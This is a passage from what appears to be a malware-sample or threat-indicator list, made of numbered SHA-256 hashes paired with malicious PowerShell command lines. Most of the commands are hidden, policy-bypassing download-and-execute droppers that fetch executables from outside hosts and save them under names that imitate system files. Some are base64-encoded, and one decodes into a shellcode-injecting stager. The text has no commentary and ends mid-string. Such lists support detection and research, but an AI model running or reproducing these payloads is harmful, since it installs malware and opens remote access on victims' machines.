  405. PowerShell  (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/sspail.exe','C:\ProgramData\.System32_dll.com');Start-Process 'C:\ProgramData\.System32_dll.com'
  406. e91dc2e9b83b93ef6bd7e99a7c2a6c98384927f04f5f3e986f2c41b45f5a09f4
  407. PowerShell  (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/xavadd.exe','C:\ProgramData\.System32_dll.com');Start-Process 'C:\ProgramData\.System32_dll.com'
  408. 4c773f99c8d7ce73420c4b1a4c75b2645f2465fa3115b299ea10d3bef9f7671b
  409. PoWerSHElL  (nEW-oBjEcT sYsTeM.neT.wEBcLiEnT).dOWNLOadfIlE('https://www.sendspace.com/pro/dl/fd21lb','C:\Users\User1\AppData\Local\Temp\wordfile.exe');
  410. 01be4aee732869702502fe67a25810af4db67328c1b8917e6d527a67c63fba8b
  411. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden $wc = New-Object System.Net.WebClient; $wc.Headers.Add('User-Agent','Windows-Media-Player/11.0.5721.5145');$wc.DownloadFile('http://www.scuoladanzamaja.it/cgi/logs.php','C:\Users\User1\AppData\Local\Temp.exe')
  412. 2312095f09a699bac2b80558442843062e96b49503f81773f61c367937e350ce
  413. 4dad0b90279a2ffdd0dd4acf6031315dcb6dd730d13c6025c78038d2746447a3
  414. 9d348fb076847815688c8d2e46d5b7a9388874c70a19dc7532932bf7b594825f
  415. a08cc2aa8461599f9b88cea5bbe868ed98ddaa3d55b6bcbcdf3ef72f3feeaacc
  416. fb9980ab94268c1a344c3b116e7a4c3898ba309922d1de32ceca06fc7c66a90d
  417. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden $wc = New-Object System.Net.Webclient;$wc.Headers.Add('User-Agent','Windows-Media-Player/11.0.5721.5145');$wc.DownloadFile('http://djprestige.net/111000/logs/logs.php','C:\Users\User1\AppData\Local\Temp.exe')
  418. 981292307b2018f2fb40c8e48210a67920520d09fbcdf3258ceee0313b196be2
  419. 9ed345a0f71ce22058cb36ed1e1235c7f2be188b7d14ead19fd1f2ade3a5e106
  420. afc43f0d32256ca6d8be608e10622db9e18af95dd1649ee671aacf006e03a398
  421. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden $wc = New-Object System.Net.Webclient;$wc.Headers.Add('User-Agent','Windows-Media-Player/11.0.5721.5145');$wc.DownloadFile('http://justins-gift.com/public/php/logs.php','C:\Users\User1\AppData\Local\Temp.exe')
  422. a165e2730c184eb6534a0aebc0041c75246e8ea67f040884d3f6e7e139da7f42
  423. c4203773250da3eb00c13b4ac2b12aad66f3427c31f99d6d46ff502300ff5d17
  424. PowerShell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Objecstem.Net.WebClient).DownloadFile('http://mobgroup.ga/teamview/teamview.exe','C:\Users\User1\AppData\Roaming\tandjeGerst.exe');Start-Process 'C:\Users\User1\AppData\Roaming\tandjeGerst.exe'
  425. a98a64a0976bb774a963886cf123ba2510ca716c883e86731cb04f33488c36de
  426. PowerShell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Objecstem.Net.WebClient).DownloadFile('http://mobgroup.ga/updated/detected.exe','C:\Users\User1\AppData\Roaming\tandjeGerst.exe');Start-Process 'C:\Users\User1\AppData\Roaming\tandjeGerst.exe'
  427. 6360306ffc0095cac18b86dcb8b243801f493ea6592c7c78c1209d00a8d10f23
  428. PowerShell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://allmods.esy.es/MessageBox.jpg','C:\Users\User1\AppData\Roaming\Example.exe');Start-Process 'C:\Users\User1\AppData\Roaming\Example.exe'
  429. 972a51b33b15f516e95ec06b6c56b2cd58bdb8365c24de2e6731bbc7aac3b6da
  430. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://bocinvest.com/wp-admin/css/upload/ayo.exe','C:\Users\User1\AppData\Roaming\mgrhost.exe');
  431. 5a62b0a734444c2ba92fc2ea3baf8f6631593ab9259cbe744d109fe2fdb9aa79
  432. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://bocinvest.com/wp-admin/css/upload/binld.exe','C:\Users\User1\AppData\Roaming\svchost.exe');
  433. 861fa402873b5946193c27dafd793650fc0bafc8580178ce76953ebcacc25e05
  434. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://bocinvest.com/wp-admin/css/upload/oko.exe','C:\Users\User1\AppData\Roaming\conhost.exe');
  435. 35ce16db318aeabd073824bae6e9ca8c420320347da152c66b8f653accceedcb
  436. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://onwajan.su/x/setup1.exe','C:\Users\User1\AppData\Roaming\DFSHJhdxzwdfsn.exe');
  437. 822709b3c811f982d774372208d0ea1e4b58c965e9bc7313645a37668974581f
  438. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://onwajan.su/x/setup2.exe','C:\Users\User1\AppData\Roaming\DFSHJhdxzwdfsn.exe');
  439. 9f70ab3654eedbca4ff648a5ad657d78aac7e7a2e196fb81731ede72c2a2d896
  440. powershell  -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://www.kalodon.ru/dgsdskld/abx.exe','C:\Users\User1\AppData\Roaming\hdsgddgf.exe');SaPs ('C:\Users\User1\AppData\Roaming\hdsgddgf.exe')
  441. 4456c5b0db3dc0f3a752131c1166d306ff2a0db7c750b264538a6067b8a88b18
  442. powershell  -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://www.kalodon.ru/offshore/oorder.exe','C:\Users\User1\AppData\Roaming\hdgshfg.exe');SaPs ('C:\Users\User1\AppData\Roaming\hdgshfg.exe')
  443. 2458c167c38a37556a94c13e64b11481a438bfd5ebc3b44ff893a9d2bd744bab
  444. c66dba97d621959db58f18f6e0639f25cb773d329bf4c8f592b8283863e625e6
  445. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/ccnxkl.exe','C:\Users\User1\AppData\Roaming\ZNDRTwyhhabeerty.exe');
  446. 4e489b1544630beb9c2f172ee1440201f095361599d2b617705001551101c935
  447. powershell  -ExecutionPolicy Unrestricted   (New-Object System.Net.WebClient).DownloadFile('http://cahajipur.com/ac/ah.exe','C:\Users\User1\AppData\Roaming\Example83.exe');Invoke-Item ('C:\Users\User1\AppData\Roaming\Example83.exe')
  448. d3867179fc9585f8611ad7d1af7cfb5ef30fc734cb3c3b9c1b4e200e1dd61232
  449. powershell  -ExecutionPolicy Unrestricted   (New-Object System.Net.WebClient).DownloadFile('http://cahajipur.com/bin/osf.exe','C:\Users\User1\AppData\Roaming\Example8312.exe');Invoke-Item ('C:\Users\User1\AppData\Roaming\Example8312.exe')
  450. 6836c93b9014b6260e381b055c6d9549402b04a3c7e3298b0793cbd0a1cafd73
  451. powershell  -ExecutionPolicy Unrestricted   (New-Object System.Net.WebClient).DownloadFile('http://cahajipur.com/gg/gp.exe','C:\Users\User1\AppData\Roaming\Example812.exe');Invoke-Item ('C:\Users\User1\AppData\Roaming\Example812.exe')
  452. d5ab58179a1dd45d630a74ddcb9c7a156c72c43e99590a6b982658ed8b77308f
  453. powershell  -ExecutionPolicy Unrestricted   (New-Object System.Net.WebClient).DownloadFile('http://cahajipur.com/mm/mm.exe','C:\Users\User1\AppData\Roaming\Example83.exe');Invoke-Item ('C:\Users\User1\AppData\Roaming\Example83.exe')
  454. 6ae6fca9ff8b340a773c5dcc42b38a0f9f8762afa292741a663376262c7ff80a
  455. 839ab04e0808a9917ac2a2f43630554ca3a87bc536a7b64051e027c13fd50b2a
  456. f1a2bb54d9e6ffd39807d9ec8d43a3ed1373a3e08dc811e4be8233f496839454
  457. powershell  -ExecutionPolicy Unrestricted   (New-Object System.Net.WebClient).DownloadFile('http://cahajipur.com/pl/hn.exe','C:\Users\User1\AppData\Roaming\Example902.exe');Invoke-Item ('C:\Users\User1\AppData\Roaming\Example902.exe')
  458. 53bdde93f826091bcdda40a71006fa6d79c950500c95006054d2a33af2d6244c
  459. powershell  -ExecutionPolicy Unrestricted   (New-Object System.Net.WebClient).DownloadFile('http://cahajipur.com/u/uu.exe','C:\Users\User1\AppData\Roaming\Example83.exe');Invoke-Item ('C:\Users\User1\AppData\Roaming\Example83.exe')
  460. 2e52da7e89bba6ed9f9ac788316515f6f636adc2b61189e701de03b88b73f5f9
  461. powershell  -ExecutionPolicy Unrestricted   (New-Object System.Net.WebClient).DownloadFile('http://cahajipur.com/zz/zb.exe','C:\Users\User1\AppData\Roaming\Example783.exe');Invoke-Item ('C:\Users\User1\AppData\Roaming\Example783.exe')
  462. 40cd5f896128ca94b383174ff0efe30fdaf35acae05fa1d96c8b244daf2e00ff
  463. POwErShEll  SeT-ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://cl.ly/3g1K2o1F1T21/download/odebrecht.office','C:\Users\User1\AppData\Roaming\Office1.exe');
  464. c0cd639515e505ac8ba0d93ea1f273e34125f82854ab392f51c6a4f6c930f5d7
  465. powershell -ExecutionPolicy Bypass -noProfile -NonInteractive -nologo -encodedcommand "WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgACcAUwBzAGwAMwAnADsAIABpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGgAbwBsAGkAZABhAHkAYwBsAHUAYgAuAGMAbwAvADEAJwApAA=="
  466. fc1b9ffd2b97102d8cbdbb101341293d16aa875925f4a9c21cd6af1a481c624e
  467. powershell iex (new-object net.webclient).downloadstring('http://10.2.21.74/favicon.ico');read-host
  468. fbb77215d4b635114efe0618fc23623a1d8aa9bd036f0d3178f3dcc4cc4b73ce
  469. powershell -nop -win hidden -noni -enc JABiADcAZQBFACAAPQAgACcAJAA3AFEAcQBMACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkADcAUQBxAEwAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZgBjACwAMAB4AGUAOAAsADAAeAA4ADkALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgAwACwAMAB4ADgAOQAsADAAeABlADUALAAwAHgAMwAxACwAMAB4AGQAMgAsADAAeAA2ADQALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAzADAALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAwAGMALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADQALAAwAHgAOABiACwAMAB4ADcAMgAsADAAeAAyADgALAAwAHgAMABmACwAMAB4AGIANwAsADAAeAA0AGEALAAwAHgAMgA2ACwAMAB4ADMAMQAsADAAeABmAGYALAAwAHgAMwAxACwAMAB4AGMAMAAsADAAeABhAGMALAAwAHgAMwBjACwAMAB4ADYAMQAsADAAeAA3AGMALAAwAHgAMAAyACwAMAB4ADIAYwAsADAAeAAyADAALAAwAHgAYwAxACwAMAB4AGMAZgAsADAAeAAwAGQALAAwAHgAMAAxACwAMAB4AGMANwAsADAAeABlADIALAAwAHgAZgAwACwAMAB4ADUAMgAsADAAeAA1ADcALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADAALAAwAHgAOABiACwAMAB4ADQAMgAsADAAeAAzAGMALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4AGIALAAwAHgANAAwACwAMAB4ADcAOAAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeAA0AGEALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA1ADAALAAwAHgAOABiACwAMAB4ADQAOAAsADAAeAAxADgALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAyADAALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeABlADMALAAwAHgAMwBjACwAMAB4ADQAOQAsADAAeAA4AGIALAAwAHgAMwA0ACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgAZAA2ACwAMAB4ADMAMQAsADAAeABmAGYALAAwAHgAMwAxACwAMAB4AGMAMAAsADAAeABhAGMALAAwAHgAYwAxACwAMAB4AGMAZgAsADAAeAAwAGQALAAwAHgAMAAxACwAMAB4AGMANwAsADAAeAAzADgALAAwAHgAZQAwACwAMAB4ADcANQAsADAAeABmADQALAAwAHgAMAAzACwAMAB4ADcAZAAsADAAeABmADgALAAwAHgAMwBiACwAMAB4ADcAZAAsADAAeAAyADQALAAwAHgANwA1ACwAMAB4AGUAMgAsADAAeAA1ADgALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAyADQALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA2ADYALAAwAHgAOABiACwAMAB4ADAAYwAsADAAeAA0AGIALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAxAGMALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA4AGIALAAwAHgAMAA0ACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAOQAsADAAeAA0ADQALAAwAHgAMgA0ACwAMAB4ADIANAAsADAAeAA1AGIALAAwAHgANQBiACwAMAB4ADYAMQAsADAAeAA1ADkALAAwAHgANQBhACwAMAB4ADUAMQAsADAAeABmAGYALAAwAHgAZQAwACwAMAB4ADUAOAAsADAAeAA1AGYALAAwAHgANQBhACwAMAB4ADgAYgAsADAAeAAxADIALAAwAHgAZQBiACwAMAB4ADgANgAsADAAeAA1AGQALAAwAHgANgA4ACwAMAB4ADMAMwAsADAAeAAzADIALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANwA3ACwAMAB4ADcAMwAsADAAeAAzADIALAAwAHgANQBmACwAMAB4ADUANAAsADAAeAA2ADgALAAwAHgANABjACwAMAB4ADcANwAsADAAeAAyADYALAAwAHgAMAA3ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAYgA4ACwAMAB4ADkAMAAsADAAeAAwADEALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAyADkALAAwAHgAYwA0ACwAMAB4ADUANAAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4ADIAOQAsADAAeAA4ADAALAAwAHgANgBiACwAMAB4ADAAMAAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMAAsADAAeAA1ADAALAAwAHgANQAwACwAMAB4ADUAMAAsADAAeAA0ADAALAAwAHgANQAwACwAMAB4ADQAMAAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4AGUAYQAsADAAeAAwAGYALAAwAHgAZABmACwAMAB4AGUAMAAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkANwAsADAAeAA2AGEALAAwAHgAMAA1ACwAMAB4ADYAOAAsADAAeABjADAALAAwAHgAYQA4ACwAMAB4ADIAYQAsADAAeAA4ADQALAAwAHgANgA4ACwAMAB4ADAAMgAsADAAeAAwADAALAAwAHgAMQAxACwAMAB4ADUAYwAsADAAeAA4ADkALAAwAHgAZQA2ACwAMAB4ADYAYQAsADAAeAAxADAALAAwAHgANQA2ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAOQA5ACwAMAB4AGEANQAsADAAeAA3ADQALAAwAHgANgAxACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADQALAAwAHgAMABjACwAMAB4AGYAZgAsADAAeAA0AGUALAAwAHgAMAA4ACwAMAB4ADcANQAsADAAeABlAGMALAAwAHgANgA4ACwAMAB4AGYAMAAsADAAeABiADUALAAwAHgAYQAyACwAMAB4ADUANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAAwADAALAAwAHgANgBhACwAMAB4ADAANAAsADAAeAA1ADYALAAwAHgANQA3ACwAMAB4ADYAOAAsADAAeAAwADIALAAwAHgAZAA5ACwAMAB4AGMAOAAsADAAeAA1AGYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4AGIALAAwAHgAMwA2ACwAMAB4ADYAYQAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAxADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA1ADYALAAwAHgANgBhACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANQA4ACwAMAB4AGEANAAsADAAeAA1ADMALAAwAHgAZQA1ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQAzACwAMAB4ADUAMwAsADAAeAA2AGEALAAwAHgAMAAwACwAMAB4ADUANgAsADAAeAA1ADMALAAwAHgANQA3ACwAMAB4ADYAOAAsADAAeAAwADIALAAwAHgAZAA5ACwAMAB4AGMAOAAsADAAeAA1AGYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAAwADEALAAwAHgAYwAzACwAMAB4ADIAOQAsADAAeABjADYALAAwAHgAOAA1ACwAMAB4AGYANgAsADAAeAA3ADUALAAwAHgAZQBjACwAMAB4AGMAMwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAOABCAGMAVgA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAOABCAGMAVgAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAOABCAGMAVgAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAGIANwBlAEUAKQApADsAJABqAGYAWAAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAEgANwBPAFkAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQASAA3AE8AWQAgACQAagBmAFgAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAagBmAFgAIAAkAGUAIgA7AH0A --> $b7eE = '$7QqL = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $7QqL -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x2a,0x84,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$8BcV=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($8BcV.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$8BcV,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($b7eE));$jfX = "-enc ";if([IntPtr]::Size -eq 8){$H7OY = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $H7OY $jfX $e"}else{;iex "& powershell $jfX $e";}
  470. 2844a019629a3b8f5885b51263ee4de1febda1d401ac81a1084104275ab6f693
  471. powershell -nop -win hidden -noni -enc SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAbABWAFYATgBiADkAcABBAEUATAAwAGoAOABSAC8AMgBZAEEAbABiAHcAUgB1AFQAUgBGAFgAYgBLAEkAZAA4AHQAWQBwAFUAQgBZAFIAVAA5AFIAQgB5AGMATgBZAEQAMgBXAEoAMgBxAFgAZABkAFMAQgBIAC8AdgBiAE0AZgBCAGgAegBSAE4ATwBGAGkAOABMADQAMwA4ACsAYgBOAHoARABLAHUAQgBOAE4AYwBDAHMASQBLAHkARQBRADEASgA2AHQAMgBpADQAOQBKAEcATABDAEMAZwA5AEQAMABVAGcAbwBCAFQARQBOAE8AWQB2AGgARgBBAGwAMQBXAEUASgBIAFYANQByAFMAUQBDAHMASgBvADcAVABuAHoAVQBqAEoAUQBpAGwANAB2AHUAYgA2AFUATwBaAEIAWQBBAEEAbABFAFYAUgBTAEcAVQA1ADkAdQBTAFkAQQA0AGYAQgB3AGUAawBoAFEAMAA1AHIANABaAG4ARgA5AGQARABkAHUAdABJAE0AdgB6AEUAcQBIAGsAagBIAFIANgBuADQANQBvADcAOABOAEgAZQBvAEsAUAA0ADYAUABPAEQAbgByAFEASAA5ADQAaABkAGkANQBMAGIAWQBBAG4AKwBNAEYAagBMAHcAMwBmADMATQBJAGkANwBqAC8AKwBSAFAAVgBFAFAAUwBzAE4ATQB5AHAAQQBVAHkAWABaAEYATABTAGkAbQBzADAAZABjAGsATwBoAHoATgBVAGEAMQB1AG0ANwBOAG4AYQBFAEEASwBWAEwAeQBHAFkAWQBzADQAWgArAEIAWgAzAGEAZAA2AEUANQB4AHIAZwBMAFcAVQA0AGYAcQAvAEUAWQB5AG0AYgBtADEARwBXACsAZQBOAFoAdwAvADcAQwBoAEQANABFAEIALwB3ADAAWABsAHAARAB5AFAAMgBEAHEAYwBQAGIAcwBwAFYALwB4AGIAQwBLAGsAMABwAHcAcABPAG4AQwA0AEwAWQBPAG0ATwBpAHYAMQBqAFIAaABMACsAbwBVAFgAYwBKAHYATgB3AFAAaAB4ACsAWABrADAAVwBuAEMAUgB5ADQAVQBhAGoAWgB3AEIAeAAwAGUAagBFAFoAdgBsAEYASgBiAFEAMgBjAHMAZgBRAHMANQBMAHoASQB0AHYAUgBKADYAVgArAFkAMgBZAFYAOABiAEsAMwBwAHYAUQAvAFUAcQAvAEIAdgArAHUASQBIADIAQwBvAHIAaABlAEEAcQB1ADAAMABaAGkAOAB4AEYAawAzAHUAVQBtADYAZABYAHcASABzAE4AVwBFAE0ARwBtAHoALwBS